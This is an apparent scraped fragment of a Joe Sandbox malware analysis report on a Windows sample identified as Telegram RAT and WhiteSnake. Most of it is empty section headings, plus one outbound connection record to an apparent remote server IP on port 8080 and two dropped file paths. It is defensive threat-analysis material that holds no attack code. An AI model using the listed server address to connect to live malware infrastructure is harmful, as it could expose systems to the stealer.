5	192.168.2.8	60235	194.164.198.113	8080	4296	C:\Users\user\Desktop\73ybGtnYXx.exe

Timestamp	Bytes transferred	Direction	Data
Mar 17, 2025 12:28:21.887998104 CET	148	OUT

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 73ybGtnYXx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: WhiteSnake

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\73ybGtnYXx.exe.log

C:\Users\user\AppData\Local\ucv4nuoh0h\report.lock

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Windows Analysis Report
73ybGtnYXx.exe